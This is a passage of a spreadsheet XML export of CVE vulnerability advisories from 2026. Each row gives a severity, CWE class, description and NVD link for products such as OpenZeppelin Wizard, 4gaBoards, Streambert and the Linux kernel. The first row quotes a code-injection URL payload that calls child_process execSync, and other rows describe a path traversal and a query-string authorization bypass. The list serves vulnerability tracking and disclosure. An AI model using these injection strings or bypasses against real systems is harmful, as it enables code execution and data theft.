          <t>OpenZeppelin Contracts Wizardis a web application to interactively build a contract out of components from OpenZeppelin Contracts. Versions prior to 0.10.9 generate a Hardhat test file (`test/test.ts`) by interpolating user-supplied `opts.name` (ERC20/ERC721) and `opts.uri` (ERC1155) directly into TypeScript string literals at `zip-hardhat.ts:48` and `:50` without any JavaScript string escaping. No authentication is required: an attacker crafts a URL such as `https[:]//wizard[.]openzeppelin[.]com/#/erc20?name=");require("child_process").execSync("...");("` and shares it with a developer. When the victim downloads the resulting zip archive and runs `npx hardhat test`, the injected Node.js code executes with the developer's local OS privileges. Version 0.10.9 fixes the issue.</t>
        </is>
      </c>
      <c r="M780" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48054</t>
        </is>
      </c>
    </row>
    <row r="781">
      <c r="A781" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B781" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49050</t>
        </is>
      </c>
      <c r="C781" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D781" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E781" s="5" t="inlineStr"/>
      <c r="F781" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G781" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H781" s="5" t="inlineStr">
        <is>
          <t>apache:dolphinscheduler</t>
        </is>
      </c>
      <c r="I781" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J781" s="5" t="inlineStr"/>
      <c r="K781" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L781" s="5" t="inlineStr">
        <is>
          <t>General user can mint admin access tokens via /access-tokens
This issue affects Apache DolphinScheduler: before 3.4.2.
Users are recommended to upgrade to version 3.4.2, which fixes the issue.</t>
        </is>
      </c>
      <c r="M781" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49050</t>
        </is>
      </c>
    </row>
    <row r="782">
      <c r="A782" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B782" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49221</t>
        </is>
      </c>
      <c r="C782" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D782" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E782" s="5" t="inlineStr"/>
      <c r="F782" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G782" s="5" t="inlineStr"/>
      <c r="H782" s="5" t="inlineStr"/>
      <c r="I782" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J782" s="5" t="inlineStr"/>
      <c r="K782" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L782" s="5" t="inlineStr">
        <is>
          <t>Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. Prior to 1.0.8.4, Vvveb backend digital asset operations allow a low-privileged Vendor to access digital assets linked to another Vendor's products. The admin/controller/product/digital-asset.php and admin/controller/product/digital-assets.php controllers and the admin/sql/sqlite/digital_asset.sql data queries use a caller-controlled digital_asset_id without consistently enforcing the current admin_id ownership boundary. An attacker can list assets, read asset names and file metadata, edit asset metadata, or delete asset records, which can disclose private product metadata, corrupt resource links, and cause data loss. This issue is fixed in version 1.0.8.4.</t>
        </is>
      </c>
      <c r="M782" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49221</t>
        </is>
      </c>
    </row>
    <row r="783">
      <c r="A783" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B783" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49228</t>
        </is>
      </c>
      <c r="C783" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D783" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E783" s="5" t="inlineStr"/>
      <c r="F783" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G783" s="5" t="inlineStr"/>
      <c r="H783" s="5" t="inlineStr"/>
      <c r="I783" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J783" s="5" t="inlineStr"/>
      <c r="K783" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L783" s="5" t="inlineStr">
        <is>
          <t>Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. Prior to 1.0.8.4, Vvveb backend product operations allow a low-privileged Vendor to access products owned by another Vendor. The admin/controller/product/products.php controller accepts a caller-controlled product_id for duplicate and delete actions, and admin/sql/sqlite/product.sql loads and mutates products without consistently applying the current admin_id when view_other_products or edit_other_products is absent. An attacker can read product details, duplicate products, or delete products and related catalog data, exposing commercial information and causing unauthorized copies, catalog pollution, data loss, or business disruption. This issue is fixed in version 1.0.8.4.</t>
        </is>
      </c>
      <c r="M783" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49228</t>
        </is>
      </c>
    </row>
    <row r="784">
      <c r="A784" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B784" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49255</t>
        </is>
      </c>
      <c r="C784" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D784" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E784" s="5" t="inlineStr"/>
      <c r="F784" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G784" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H784" s="5" t="inlineStr"/>
      <c r="I784" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J784" s="5" t="inlineStr"/>
      <c r="K784" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L784" s="5" t="inlineStr">
        <is>
          <t>electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. Prior to 3.11.11, electerm constructs operating system commands in src/app/lib/fs.js by interpolating untrusted file paths into the rmrf(), mv(), and cp() functions. A malicious SSH or SFTP server can provide a filename containing quote characters and shell metacharacters, and a victim can cause that filename to reach the affected operation during remote-to-local transfer, conflict renaming, copying, moving, or removal. The generated `rm -rf`, mv, `cp -r`, PowerShell Remove-Item, Move-Item, or Copy-Item command can then interpret the filename as shell syntax. This allows arbitrary command execution with the electerm desktop user's privileges on POSIX and Windows systems, enabling data exfiltration, file modification, malware installation, or denial of service. This issue is fixed in version 3.11.11.</t>
        </is>
      </c>
      <c r="M784" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49255</t>
        </is>
      </c>
    </row>
    <row r="785">
      <c r="A785" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B785" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49467</t>
        </is>
      </c>
      <c r="C785" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D785" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E785" s="5" t="inlineStr"/>
      <c r="F785" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G785" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H785" s="5" t="inlineStr"/>
      <c r="I785" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J785" s="5" t="inlineStr"/>
      <c r="K785" s="5" t="inlineStr">
        <is>
          <t>CWE-303, CWE-304</t>
        </is>
      </c>
      <c r="L785" s="5" t="inlineStr">
        <is>
          <t>Pingvin Share X is a secure and easy self-hosted file sharing platform. A vulnerability in versions 1.5.0 through 1.18.0 allow an attacker to bypass password verification when managing Time-based One-Time Password (TOTP) settings. The root cause is a missing `await` keyword on calls to the asynchronous `verifyPassword` method in `authTotp.service.ts` and the `authenticateUser` method in `auth.service.ts`. In JavaScript, an unawaited `Promise` is always truthy. So the logic intended to throw a `ForbiddenException` when a password is incorrect. It never executes because the expression evaluates the existence of the `Promise` object rather than its resolved boolean result. The vulnerability is fixed in version 1.18.1 by ensuring all asynchronous authentication calls are properly awaited. There are no official workarounds. If a user is locked out, an administrator must manually reset the user's TOTP status in the database.</t>
        </is>
      </c>
      <c r="M785" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49467</t>
        </is>
      </c>
    </row>
    <row r="786">
      <c r="A786" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B786" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49473</t>
        </is>
      </c>
      <c r="C786" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D786" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E786" s="5" t="inlineStr"/>
      <c r="F786" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G786" s="5" t="inlineStr"/>
      <c r="H786" s="5" t="inlineStr"/>
      <c r="I786" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J786" s="5" t="inlineStr"/>
      <c r="K786" s="5" t="inlineStr">
        <is>
          <t>CWE-436, CWE-863</t>
        </is>
      </c>
      <c r="L786" s="5" t="inlineStr">
        <is>
          <t>@cedar-policy/authorization-for-expressjs is an open-source Express.js middleware that integrates Cedar authorization into Express applications by mapping HTTP requests to Cedar actions and evaluating authorization policies before allowing requests to proceed. Versions prior to 0.3.0 have an issue where, under certain circumstances, the middleware matches incoming requests against Cedar action mappings using req.originalUrl, which includes the query string, while Express routes requests using only the path component. The middleware uses req.originalUrl to match incoming requests against Cedar action mappings. In Express, req.originalUrl includes the query string, while route matching uses only the path. This creates a divergence between what Cedar authorizes and what Express executes. When an application defines separate actions for overlapping path prefixes with different authorization requirements (for example, GET /users for listing all users with admin-only access, and GET /users/{id} for retrieving a single user with any authenticated user access), an actor can append a query string to bypass the more restrictive policy. Sending GET /users/?x=1 causes the middleware to match against /users/{id} (with id parameter set to ?x=1) and evaluate the less restrictive action, while Express routes the request to the /users list handler. This allows inappropriate access to the more restrictive endpoint. This issue has been addressed in version 0.30. Some workarounds are available. Validate and sanitize incoming request paths before they reach the authorization middleware. Ensure that applications do not rely solely on the middleware for authorization when defining multiple actions on overlapping path prefixes with different permission levels.</t>
        </is>
      </c>
      <c r="M786" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49473</t>
        </is>
      </c>
    </row>
    <row r="787">
      <c r="A787" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B787" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49879</t>
        </is>
      </c>
      <c r="C787" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D787" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E787" s="5" t="inlineStr"/>
      <c r="F787" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G787" s="5" t="inlineStr"/>
      <c r="H787" s="5" t="inlineStr"/>
      <c r="I787" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J787" s="5" t="inlineStr"/>
      <c r="K787" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L787" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of rw_t3t.cc, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M787" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49879</t>
        </is>
      </c>
    </row>
    <row r="788">
      <c r="A788" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B788" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49882</t>
        </is>
      </c>
      <c r="C788" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D788" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E788" s="5" t="inlineStr"/>
      <c r="F788" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G788" s="5" t="inlineStr"/>
      <c r="H788" s="5" t="inlineStr"/>
      <c r="I788" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J788" s="5" t="inlineStr"/>
      <c r="K788" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L788" s="5" t="inlineStr">
        <is>
          <t>In rw_mfc_handle_read_op of rw_mfc.cc, there is a possible memory safety issue due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M788" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49882</t>
        </is>
      </c>
    </row>
    <row r="789">
      <c r="A789" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B789" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50186</t>
        </is>
      </c>
      <c r="C789" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D789" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E789" s="5" t="inlineStr"/>
      <c r="F789" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G789" s="5" t="inlineStr"/>
      <c r="H789" s="5" t="inlineStr"/>
      <c r="I789" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J789" s="5" t="inlineStr"/>
      <c r="K789" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L789" s="5" t="inlineStr">
        <is>
          <t>4gaBoards is a boards system for realtime project management. Prior to 3.3.8, 4gaBoards allows an authenticated project manager to supply traversal sequences in the filename parameter of GET /exports/:id/:filename. In server/api/controllers/boards/download.js, the decoded inputs.filename value is passed to path.join() beneath private/exports/&lt;user_id&gt;/ without containment validation. A crafted value such as ../ can select an arbitrary file readable by the server process, and the file is returned to the attacker. The fileStream close handler then passes the same path to fs.unlink(), deleting the selected file and potentially causing data loss or denial of service. This issue is fixed in version 3.3.8.</t>
        </is>
      </c>
      <c r="M789" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50186</t>
        </is>
      </c>
    </row>
    <row r="790">
      <c r="A790" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B790" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50191</t>
        </is>
      </c>
      <c r="C790" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D790" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E790" s="5" t="inlineStr"/>
      <c r="F790" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G790" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H790" s="5" t="inlineStr"/>
      <c r="I790" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J790" s="5" t="inlineStr"/>
      <c r="K790" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-288</t>
        </is>
      </c>
      <c r="L790" s="5" t="inlineStr">
        <is>
          <t>4gaBoards is a boards system for realtime project management. Prior to 3.3.8, 4gaBoards is vulnerable to pre-account takeover when registrationEnabled, localRegistrationEnabled, and ssoRegistrationEnabled are enabled and Google, GitHub, Microsoft, or OIDC SSO is configured. The POST /api/register endpoint permits creation of an unverified local account with a victim's email address, and POST /api/access-tokens permits that account to authenticate while isVerified is false. During the victim's first SSO login, server/api/helpers/users/get-create-one-for-github-sso.js, server/api/helpers/users/get-create-one-for-google-sso.js, server/api/helpers/users/get-create-one-for-microsoft-sso.js, and server/api/helpers/users/get-create-one-for-oidc-sso.js find the attacker-controlled account by email and link the verified SSO identity without confirming ownership of the local account. The attacker can retain local-password access to the linked account and obtain the victim's projects, data, and permissions. This issue is fixed in version 3.3.8.</t>
        </is>
      </c>
      <c r="M790" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50191</t>
        </is>
      </c>
    </row>
    <row r="791">
      <c r="A791" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B791" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50768</t>
        </is>
      </c>
      <c r="C791" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D791" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E791" s="5" t="inlineStr"/>
      <c r="F791" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G791" s="5" t="inlineStr"/>
      <c r="H791" s="5" t="inlineStr"/>
      <c r="I791" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J791" s="5" t="inlineStr"/>
      <c r="K791" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L791" s="5" t="inlineStr">
        <is>
          <t>File Upload vulnerability in T-Systems International GmbH ImageMaster Version: 9.14.2.8.1 allows a remote attacker to execute arbitrary code via the add attachments feature in the create new document function.</t>
        </is>
      </c>
      <c r="M791" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50768</t>
        </is>
      </c>
    </row>
    <row r="792">
      <c r="A792" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B792" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51974</t>
        </is>
      </c>
      <c r="C792" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D792" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E792" s="5" t="inlineStr"/>
      <c r="F792" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G792" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H792" s="5" t="inlineStr"/>
      <c r="I792" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J792" s="5" t="inlineStr"/>
      <c r="K792" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L792" s="5" t="inlineStr">
        <is>
          <t>An eval() injection vulnerability in the get_list function in modules/meta_parser.py in lllyasviel Fooocus 2.1.854 through 2.5.5 allows remote attackers to execute arbitrary Python code via a crafted styles payload in the EXIF metadata of an uploaded image file.</t>
        </is>
      </c>
      <c r="M792" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51974</t>
        </is>
      </c>
    </row>
    <row r="793">
      <c r="A793" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B793" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52691</t>
        </is>
      </c>
      <c r="C793" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D793" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E793" s="5" t="inlineStr"/>
      <c r="F793" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G793" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H793" s="5" t="inlineStr"/>
      <c r="I793" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J793" s="5" t="inlineStr"/>
      <c r="K793" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L793" s="5" t="inlineStr">
        <is>
          <t>** UNSUPPORTED WHEN ASSIGNED ** Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Griffin Hive Metastore Module. 
This issue affects Apache Griffin Hive Metastore Module: all versions.
As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.
NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
        </is>
      </c>
      <c r="M793" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52691</t>
        </is>
      </c>
    </row>
    <row r="794">
      <c r="A794" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B794" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52775</t>
        </is>
      </c>
      <c r="C794" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D794" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E794" s="5" t="inlineStr"/>
      <c r="F794" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G794" s="5" t="inlineStr"/>
      <c r="H794" s="5" t="inlineStr"/>
      <c r="I794" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J794" s="5" t="inlineStr"/>
      <c r="K794" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L794" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. Prior to version 4.6.6, YesWiki through the latest development branch contains a SQL injection vulnerability in ReactionManager::deleteUserReaction() that allows any authenticated user to inject arbitrary SQL via the {idreaction} and {id} URL path parameters. The parameters are concatenated directly into a SQL LIKE clause without escaping or parameterization. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="M794" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52775</t>
        </is>
      </c>
    </row>
    <row r="795">
      <c r="A795" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B795" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52872</t>
        </is>
      </c>
      <c r="C795" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D795" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E795" s="5" t="inlineStr"/>
      <c r="F795" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G795" s="5" t="inlineStr"/>
      <c r="H795" s="5" t="inlineStr"/>
      <c r="I795" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J795" s="5" t="inlineStr"/>
      <c r="K795" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="L795" s="5" t="inlineStr">
        <is>
          <t>Streambert is a cross-platform Electron Desktop App to stream and download video content. Prior to 2.5.0, the downloadSubtitleFile utility in src/ipc/downloads.js, reached through the run-download IPC channel, accepts a renderer-supplied subtitle url using the file: URI scheme and passes its decoded pathname to fs.copyFileSync. The renderer also controls downloadPath, which determines the destination path. A compromised renderer can therefore copy any file readable by the StreamBERT process into an attacker-chosen writable location, exposing sensitive local data, and can overwrite existing writable files. This vulnerability is fixed in 2.5.0.</t>
        </is>
      </c>
      <c r="M795" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52872</t>
        </is>
      </c>
    </row>
    <row r="796">
      <c r="A796" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B796" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52876</t>
        </is>
      </c>
      <c r="C796" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D796" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E796" s="5" t="inlineStr"/>
      <c r="F796" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G796" s="5" t="inlineStr"/>
      <c r="H796" s="5" t="inlineStr"/>
      <c r="I796" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J796" s="5" t="inlineStr"/>
      <c r="K796" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-78</t>
        </is>
      </c>
      <c r="L796" s="5" t="inlineStr">
        <is>
          <t>Streambert is a cross-platform Electron Desktop App to stream and download video content. Prior to version 2.6.0, the open-path-at-time IPC handler in src/ipc/player.js accepts a renderer-controlled filePath without validating its type or location. If the mpv or VLC launch attempts are skipped or fail, the handler passes filePath to Electron's shell.openPath. A compromised renderer can provide the path of a local executable, script, shortcut, or other file with an executing default handler, causing the operating system to launch it with the privileges of the StreamBERT process and enabling escape from the renderer sandbox. This issue is fixed in version 2.6.0.</t>
        </is>
      </c>
      <c r="M796" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52876</t>
        </is>
      </c>
    </row>
    <row r="797">
      <c r="A797" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B797" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53071</t>
        </is>
      </c>
      <c r="C797" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D797" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E797" s="5" t="inlineStr"/>
      <c r="F797" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G797" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H797" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I797" s="5" t="inlineStr">
        <is>
          <t>2026-06-24</t>
        </is>
      </c>
      <c r="J797" s="5" t="inlineStr"/>
      <c r="K797" s="5" t="inlineStr">
        <is>
          <t>CWE-416, CWE-667</t>
        </is>
      </c>
      <c r="L797" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: l2cap: Add missing chan lock in l2cap_ecred_reconf_rsp
l2cap_ecred_reconf_rsp() calls l2cap_chan_del() without holding
l2cap_chan_lock(). Every other l2cap_chan_del() caller in the file
acquires the lock first. A remote BLE device can send a crafted
L2CAP ECRED reconfiguration response to corrupt the channel list
while another thread is iterating it.
Add l2cap_chan_hold() and l2cap_chan_lock() before l2cap_chan_del(),
and l2cap_chan_unlock() and l2cap_chan_put() after, matching the
pattern used in l2cap_ecred_conn_rsp() and l2cap_conn_del().</t>
        </is>
      </c>
      <c r="M797" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53071</t>
        </is>
      </c>
    </row>
    <row r="798">
      <c r="A798" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B798" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53277</t>
        </is>
      </c>
      <c r="C798" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D798" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E798" s="5" t="inlineStr"/>
      <c r="F798" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G798" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H798" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I798" s="5" t="inlineStr">
        <is>
          <t>2026-06-25</t>
        </is>
      </c>
      <c r="J798" s="5" t="inlineStr"/>
      <c r="K798" s="5" t="inlineStr">
        <is>
          <t>CWE-662, CWE-820</t>
        </is>
      </c>
      <c r="L798" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: arm64: Take the SRCU lock for page table walks in fault injection and AT emulation
walk_s1() and kvm_walk_nested_s2() expect to be called while holding
kvm-&gt;srcu to guard against memslot changes. While this is generally
the case, __kvm_at_s12() and __kvm_find_s1_desc_level() call into the
respective walkers without taking kvm-&gt;srcu.
Fix by acquiring kvm-&gt;srcu prior to the table walk in both instances.</t>
        </is>
      </c>
      <c r="M798" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53277</t>
        </is>
      </c>
    </row>
    <row r="799">
      <c r="A799" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B799" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53322</t>
        </is>
      </c>
      <c r="C799" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D799" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E799" s="5" t="inlineStr"/>
      <c r="F799" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G799" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H799" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I799" s="5" t="inlineStr">
        <is>
          <t>2026-06-26</t>
        </is>
      </c>
      <c r="J799" s="5" t="inlineStr"/>
      <c r="K799" s="5" t="inlineStr">
        <is>
          <t>CWE-415, CWE-826</t>
        </is>
      </c>
      <c r="L799" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
